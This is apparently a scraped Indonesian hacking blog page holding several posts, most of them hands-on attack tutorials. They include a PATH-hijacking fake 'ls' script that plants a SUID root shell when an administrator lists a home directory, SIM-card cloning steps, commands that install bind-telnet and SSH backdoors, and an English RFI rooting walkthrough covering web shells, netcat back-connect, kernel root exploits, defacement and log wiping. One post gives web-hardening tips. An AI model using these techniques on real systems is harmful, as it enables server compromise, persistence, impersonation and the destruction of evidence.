berjalan untuk menerima perintah-perintah hasil karangan kamu sendiri.

Berikut adalah cuplikan dari metode milik Hacker nagageni 212 yang telah

berhasil memodifikasi program sendmail di server (PSM=Pukulan

Sinar Matahari):

212@GG> telnet 25

Trying …

Connected to

Escape character is ‘^]’.

220 ESMTP Sendmail 8.8.5/8.8.5; … [snip] …

PSM_EXEC /bin/cp /bin/sh /tmp/elit

Done … master!

PSM_EXEC /bin/chmod 4755 /tmp/elit

Done … master!

Jika menurut kamu cuplikan diatas sudah cukup familiar, maka kami dengan

segala kerendahan hati minta izin untuk berguru!

3 Trojan Horse


Tidak akan banyak penjelasan mengenai metode ini, sebab pada umumnya

Trojan Horse hanya efektif jika kamu betul-betul pintar menutupi suatu

program atau jika sang sysadmin memang betul-betul tolol. Pada prinsipnya,

Trojan Horse adalah program yang mempunyai ‘feature’ gelap. Misalnya kamu

membuat sebuah game yang cukup heboh dan kamu dengan sengaja menyelipkan

perintah untuk membuka akses di dalam kode game kamu, sedemikian rupa

sehingga saat sang sysadmin menjalankan program tersebut, tanpa

disadarinya file .rhosts nya telah ketambahan sesuatu. Kami kenal seorang

hacker yang lihai menulis skrip IRC, dan skrip IRC-nya kebetulan mempunyai

banyak peminat. Beberapa ‘lamers’ mendownload skrip tersebut tanpa

menyadari bahwa sang skrip menyelipkan beberapa perintah untuk mengizinkan

akses tak berpassword kepada sang penulis asli skrip. (Hello, Tut!)

4 Trapdoor


Banyak persamaan antara Trapdoor dengan Backdoor dan Trojan Horse, namun

dalam artikel ini, ‘Trapdoor’ diasumsikan sebagai cara yang bisa kita

gunakan untuk menjebak (trap) sang sysadmin untuk memberikan kita akses

root kedalam sistem. Seringkali kita terbentur masalah sistem operasi yang

paling gres, atau sebuah sistem dimana hampir semua eksploit untuk

mendapatkan root tidak berjalan sama sekali (patched systems). Jangan

putus asa! Masih banyak metode yang bisa kita terapkan untuk membuat sang

sysadmin tertipu, berakibat dibukanya akses ke dalam sistem. Misalkan kamu

sudah berhari-hari mengoprek sebuah target dengan menggunakan account dan

password seorang user biasa hasil colongan lewat phf, dan sayangnya tidak

ada exploit yang mempan. Nah, sudah saatnya kita terapkan metode Trapdoor.

Berikut adalah metode Trapdoor yang walaupun sederhana, masih saja bisa

mengelabui puluhan sysadmin diluar sana.

Pertama-tama, kamu perlu merubah perizinan homedir kamu (atau homedir

milik user yang accountnya kamu ‘pinjam’):

user1@korban> chmod 700 ~/.

Nah, karena sekarang homedir kamu bermode 700, sang syadmin perlu

mengganti privilesenya ke root jika beliau ingin memeriksa isi direktori

ybs. Nah, langkah berikutnya adalah membuat sebuah skrip yang bertugas

untuk bertingkahlaku selayaknya perintah biasa, namun diluar pengetahuan

sang admin, justru membuka satu (atau beberapa) kelemahan dalam sistem.

Yang langsung terpikir olehmu, jelas, perintah ls. Disinilah letak

kelemahan UNIX dibanding … uh, MS-DOS. Dalam UNIX, seorang sysadmin yang

baik selalu mengetik ‘full pathname’ dari program manapun yang dia

jalankan (seperti /bin/ls atau /usr/sbin/vi index.html), dan untuk tujuan

kemudahan, biasanya /bin atau /usr/sbin sudah dimasukkan dalam daftar

search path. Jadi jika misalnya sang sysadmin melakukan:

root# pwd


root# ls

maka yang dijalankan adalah program /bin/ls. Apa akibatnya jika kebetulan

dalam direktori /usr/home/staff/user1 kita letakkan sebuah skrip bernama

‘ls’? Heheheh … cukup menarik, khan. Nah, sekarang kita bisa buat sebuah

skrip yang berisi:

  1. !/bin/sh

cp /bin/sh /tmp/vi-save-902887

chown root /tmp/vi-save-902887

chmod 4755 /tmp/vi-save-902887

rm ./ls


simpan skrip tersebut di homedir user1, beri nama “ls” dan

user1@korban> chmod +x ls

sekarang tinggal pintar-pintarnya kamu mengakali sang sysadmin untuk

mengecek isi homedir user1. Jika kamu kebetulan punya login/passwd untuk

user2 di mesin yang sama, maka kamu bisa saja ‘mengundang’ sang admin.

Login sebagai user1, dan kirim imel

user1@korban> mail root@localhost

Subject: “Heheheh … Kena garap dari belakang!”

Hello sysadmin tolol! Mesin kamu sudah kebobolan!


God of All Hackers, Virus Researchers and Lame Mailbombers,



Saat menerima imel ini, sang Syadmin pun akan segera memeriksa isi homedir

user1 (dengan perintah ls, tentunya), dan tanpa disadari sang sysadmin

telah menciptakan sebuah shell root di /tmp/vi-save-902887. Dan, karena

vi-save-902887 ber-SUID root, kamu bisa melakukan bermacam-macam hal

menyenangkan dengannya. Tinggal login sebagai user2 beberapa waktu

kemudian, dan nikmati ketenangan pikiran lewat shell root! Heheheh …

[+/-] Selengkapnya…

[+/-] Ringkasan…

Diposkan oleh di 11:43 1 komentar Link ke posting ini

Minggu, 2008 Oktober 26
Kloning Nomor Handphone.

Kloning nomor handphone? Mungkin itu salah satu berita yang sangat hangat dibicarakan sekarang ini. Penyebab nya tak lain adalah adanya dugaan pembunuhan penegak HAM (alm. Munir) menggunakan sarana ini. Sebenarnya peng-kloningan nomor handphone tidak lah sesulit yang dibayangkan, ini sangat mungkin bisa dilakukan oleh siapapun. Jadi kalau sudah begitu, pertanyaannya yang muncul dibenak saudara mungkin bagaimanakah cara melakukannya? Baiklah saya akan sedikit sharing ilmu dengan rekan-rekan semuanya tentang cara pengkloningan nomor handphone.

Pengkloningan nomor handphone dapat dilakukan dengan 2 cara yaitu yang pertama dengan menerobos system jaringan operator dan melakukan pengkloningan nomor handphone dan yang kedua menggunakan software/alat yang diproduksi oleh Taiwan. Apakah anda pernah mengalami kehilangan SIM handphone? Lalu anda datang kepada pihak operator dan hanya bermodalkan KTP serta materai anda bisa mendapatkan nomor anda kembali dalam beberapa menit proses. Kira-kira seperti itu lah proses peng-kloningan SIM handphone. Dimana pihak operator dapat melakukan pengkloningan SIM semaunya. Tapi dalam artikel ini saya tidak akan membahas bagaimana caranya untuk menerobos system operator seluler dan melakukan peng-kloningan karena hal ini sangat melanggar kode etik hacker dan bisa meresahkan masyarakat. Pada kali ini saya akan menerangkan sedikit cara pengkloningan menggunakan alat/software.

Kira-kira 1 tahun yang lalu, sebuah alat canggih telah diciptakan oleh Taiwan yang berfungsi untuk mengkloning nomor telepon. Alat itu mempunyai nama Sim Max dan Sim Master 3. Jika anda ingin mempunyai alat ini anda tidak perlu susah untuk mencarinya karena alat ini sudah masuk ke indonesia dan anda dapat mendapatkannya dengan budget yang terbilang murah untuk ukuran alat secanggih ini. Alat ini dibanderol dengan harga 1,5 juta/bundle (sudah termasuk alat dan Software). Bundle-an ini berisi master card sim yang kosong sebanyak 12 buah dan satu buah cd software.

Proses nya pun tidak terlalu sulit. Apakah anda pernah melakukan transfer data dari satu disket ke disket lainnya menggunakan komputer? Mirip begitulah proses peng-kloningannya. Proses ini menggunakan prinsip kerja reader SIM meng-copy ke komputer lalu kompputer meng-copy balik ke sim card yang masih kosong. Hanya dalam beberapa jam anda dapat melakukannya dengan sukses.

Untuk lebih jelasnya saya akan menjelaskan step by step untuk melakukannya :
Pertama-tama anda hubungan sim card reader itu ke computer. Lalu masukkan sim card induk atau yang ingin di cloning ke dalam sim card reader dan masukan CD yang disertakan, lalu software akan otomatis melakukan back-up data, seluruh data yang berada di sim akan pindah untuk sementara ke dalam hardisk komputer kita. Setelah itu masukkan sim card yang kosong dan ikuti langkah yang disediakan oleh SIM MAX, proses ini akan memakan waktu kira-kira 5 jam dan setelah itu sim card yang kosong tadi sudah bisa digunakan layaknya SIM asli dari operator seluler. Walaupun anda sudah berhasil meng-kloning SIM menjadi dua, anda hanya bisa menggunakan satu SIM saja, yaitu sim kosong yang baru saja anda gunakan untuk meng-copy tadi ini dikarenakan sewaktu register di network, operator sudah memblock network untuk SIM lama dikarenakan sudah tergolong expired..

Mungkin itu adalah step by step untuk melakukan peng-kloningan SIM handphone, jadi tidak ada alasan bagi terdakwa di pengadilan kasus HAM (Alm. Munir) untuk mengelak jika memang terbukti melakukan peng-kloningan nomor handphone, karena pada zaman sekarang tidak ada yang mustahil dilakukan menggunakan IT. Penulis menyadari mungkin artikel ini dikemudian hari akan menimbulkan dampak yang negatif, tapi penulis tidak bertanggung jawab atas dipublikasikannya artikel ini jika disuatu hari terjadi kejahatan terhadap aksi peng-kloningan nomor handphone itu sendiri. Itu tergantung respon dari rekan-rekan sendiri. Jika rekan-rekan mengganggap diri rekan-rekan adalah hacker sejati, mari kita sama-sama menjunjung tinggi sikap privacy orang dan seperti biasa tugas kita hanya untuk mencari kelemahan dan memberitahukannya kepada pihak yang berwajib bukan kita yang beraksi untuk mengacaukan keadaan.

[+/-] Selengkapnya…

[+/-] Ringkasan…

Diposkan oleh di 12:23 2 komentar Link ke posting ini

Rabu, 2008 April 09
Pengamanan Web Server Dan Site (Versi SQL Injection, JS, XSS, CSS)

Percaya atau tidak kalau mengamankan web itu lebih sulit daripada merusak tampilan atau merusak database dari web tersebut.
Maraknya deface dan hacking yg dilakukan oleh beberapa orang yg dikarenakan kesalahan konfigurasi system atau kurangnya pengetahuan webmaster masih sering dilakukan.

1. Pencegahan SQL Injection, contoh sintak SQL Injection :

?or 1=1–

Penyerangan melalui teknik ini sama artinya dng penyerangan terhadap database. Untuk melakukan pencegahan terhadap SQL Injection ini, pertama seperti kita ketahui karakter ( ? ), (–), (NULL), (\x00), (\n), (\r), (?), (/), (/x1a) merupakan biang masalah dari SQL ini, tips nya yaitu escape semua special karakter tersebut untuk php/mysql: mysql_real_escape_string. Atau dengan cara kedua yaitu filter semua karakter yang masuk dan hanya mengijinkan karakter ttt yg dpt di inputkan. Yg perlu diingat, Sql injection ini tidak hanya bisa masuk melalui inputan dari user tetapi juga bisa melalui URL dengan bantuan karakter ( ; ) yang arti dari karakter itu adalah ?baris dibelakang ; akan ikut di eksekusi?. Disarankan, abaikan semua karakter setelah alamat URL. Contoh script yang membatasi karakter yang bisa masukkan :

function validatepassword( input )
good_password_chars =
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
end function

2. Pencegahan XSS (Cross Side Scripting), contoh script XSS :

Pencurian cookie biasanya sering dilakukan melalui teknik ini. Dengan ditemukan kelemahan XSS ini maka user dapat menjalankan script melalui form, buku tamu atau URL. Walaupun perubahan yang bisa dilakukan hanya bersifat clien tetapi bila cookie dicuri lain soal…..! Jadi untuk mencegah XSS adalah dengan Konversi < dan > menjadi menjadi lt; dan gt; dan dengan diawali karakter & (itu berarti pengganti nilai < dan > dlm tag HTML) dan filter semua inputan dari user.

3. Pemasukkan Tag HTML. Biasa cara ini kebanyakan dilakukan melalui buku tamu. Dengan cara ini seseorang dapat menambahkan tampilan sesuai dengan keinginan mereka. Dari beberapa pengalaman, biasanya para web master melakukan pencegahan ini dengan menambahkan karakter tertentu di awal karakter < atau >. Tapi fungsi untuk mencegah tag HTML sekarang sudah disediakan langsung oleh PHP jadi kita tinggal pakai saja (htmlspecialchars). Contoh script :

function cleanup($value=””, $preserve=””, $tag=””) {
if (empty($preserve)) {
$value=strip_tags($value, $allowed_tags);
return $value;

4. Batasi penggunaan Java Script dan jangan menggunakan java script untuk membuat sesuatu yang akan meyangkut hidup matinya web anda, karena java script bersifat client dan membuat akses yang akan sangat lambat. Disarankan gunakan aplikasi yang lain seperti PHP dan ASP karena sudah bersifat server.

5. Penyimpanan file database sebaiknya disimpan dlm directory private. Jangan pernah menyimpannya di directory public yang memungkinkan orang lain dapat mengaksesnya. Tapi biasanya di web hosting sudah menyediakan direktori khusus untuk database. Dalam keamanan database harus dilindungi dengan password. Koneksi sebaiknya di enkripsi dengan SSL. Data yang penting jangan disimpan secara langsung melainkan sebagai hash (md5) atau modifikasi dari md5 yaitu SHA-256 dan SHA-512 atau terenkripsi dengan bahasa pemrograman lain misalnya PHP.

6. Berhati hatilah memilih webhosting, itu sudah kami buktikan. Sehebat apapun web yang dibuat walaupun pengecekan password dibuat 2 kali dan di encrypt berapa kalipun kalau sudah server yang diserang kita tidak bisa berbuat apa apa.

Thx To  Ade Surya Iskandar The Hacking Inspiration 😛

ngeroot server injeckan

Posted in hacking on 31/03/2009 by soloteam
Sekilas cara ngeroot server injeckan

Pertama dapatkan sebuah target lalu kita load bind telnet

1. wget
tar -zxvf blind.tar.gz;rm -rf blind.tar.gz
mv blind httpd
lalu login dengan port 1953 telnet pass:samboda

2. cd /tmp atau directory full write
tar -zxvf root.tar.gz;rm -rf root.tar.gz
cd .binsh
./sesuaikan dengan kernelnya


- kernel 2.4.20
bravo anda pasti dapat rootnya

3. Jangan lupa install backdoor ssh setelah mendapat rootnya
tar -zxvf ssh.tar.gz;rm -rf ssh.tar.gz
cd sshdoor
./install passwordmu portmu


- ./install kangkung 1234
- ./install kangkung 1212

Selamat mencoba ...
By Kangkung@ArabHack.CoMmUniTy
  1. ################################

RFI Rooting Tutorial

Posted in hacking on 31/03/2009 by soloteam

R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)

Posted by: Bug Dork on: December 30, 2008

  • In: Tutorial
  • Comment!

R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)
You will need:
– Vulnerable Site in R.F.I.
– Shell for R.F.I. (e.g. c99, r57 or other)
– NetCat
– Local Root Exploit (depending on the kernel and the version)
This aim tutorial is to give a very general picture in process of Rooting
in Linux Server with Safe Mod: OFF.

Suppose that we have found a site with R.F.I. vulnerability:
e can run shell exploiting Remote File Inclusion, as follows:…vilscript.txt?
where evilscript.txt is our web shell that we have already uploaded to
our site. ( in the folder: shells)
After we enter in shell, first of all we will see the version of the kernel
at the top of the page or by typing: uname – a in Command line.
To continue we must connect with backconnection to the box. This can done with
two ways if we have the suitable shell.
We can use the Back-Connect module of r57/c99 shell or to upload a backconnector
in a writable folder
In most of the shells there is a backconnection feature without to upload the
Connect Back Shell (or another one shell in perl/c). We will analyze the first
way which is inside the shell (in our example the shell is r57).
Initially we open NetCat and give to listen in a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) with the
following way:
We will type: 11457 in the port input (This is the default port for the last versions
of r57 shell). We can use and other port.
We press in Windows Start -> Run -> and we type: cmd
After we will go to the NetCat directory:
cd C:\Program Files\Netcat
And we type the following command:
nc -n -l -v -p 11457
NetCat respond: listening on [any] 11457 …
In the central page of r57 shell we find under the following menu::: Net:: and
back-connect. In the IP Form we will type our IP ( to see our ip if
we have dynamic)
In the Port form we will put the port that we opened and NetCat listens.
If we press connect the shell will respond:
Now script try connect to <IP here> port 11457 …
If our settings are correct NetCat will give us a shell to the server
Now we wil continue to the Rooting proccess.
We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root priviledges in the box. Depending on the version
of the Linux kernel there are different exploits. Some times the exploits fail to run
because some boxes are patched or we don’t have the correct permissions.
List of the exploits/kernel:
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.
We can find writable folders/files by typing:
find / -perm -2 -ls
We can use the /tmp folder which is a standard writable folder
We type: cd /tmp
To download the local root exploit we can use a download command for linux like
For example:
wget http://www.Example/localroot/h00lyshit.c
where is the url of h00lyshit.
After the download we must compile the exploit (Read the instruction of the exploit
before the compile)
For the h00lyshit we must type:
gcc h00lyshit.c -o h00lyshit
Now we have created the executable file: h00lyshit.
The command to run this exploit is:
./h00lyshit <very big file on the disk>
We need a very big file on the disk in order to run successfully and to get root.
We must create a big file in /tmp or into another writable folder.
The command is:
dd if=/dev/urandom of=largefile count=2M
where largefile is the filename.
We must wait 2-3 minutes for the file creation
If this command fails we can try:
dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024
Now we can procced to the last step. We can run the exploit by typing:
./h00lyshit largefile or
./h00lyshit /tmp/largefile
(If we are in a different writable folder and the largefile is created in /tmp)
If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root
To check if we got root:
id or
If it says root we got root!
Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.
We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.
good luck 😛